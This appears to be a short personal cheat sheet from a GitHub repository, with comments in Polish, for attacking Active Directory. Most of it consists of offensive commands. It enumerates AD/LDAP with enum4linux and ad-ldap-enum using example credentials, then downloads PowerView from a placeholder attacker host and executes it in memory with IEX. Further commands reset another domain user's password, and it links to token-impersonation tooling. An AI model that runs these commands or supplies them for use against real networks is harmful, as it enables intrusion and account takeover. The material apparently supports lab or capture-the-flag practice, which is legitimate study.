-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathAD
More file actions
14 lines (10 loc) · 726 Bytes
/
Copy pathAD
File metadata and controls
14 lines (10 loc) · 726 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
enumeracja AD/LDAP
enum4linux 10.10.11.35
https://github.com/CroweCybersecurity/ad-ldap-enum
python 'ad-ldap-enum.py' -d contoso.com -l 10.0.0.1 -u 'Administrator' -p 'P@ssw0rd' -o 'ad-ldap-enum_2' --verbosity BASIC -lf 'ad-ldap-enum_Log.txt'
powerview.ps1 -> zmiana hasla innego usera + wiele innych
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
https://medium.com/r3d-buck3t/domain-escalation-with-token-impersonation-bc577db55a0f
https://github.com/FSecureLABS/incognito/blob/394545ffb844afcc18e798737cbd070ff3a4eb29/incognito.exe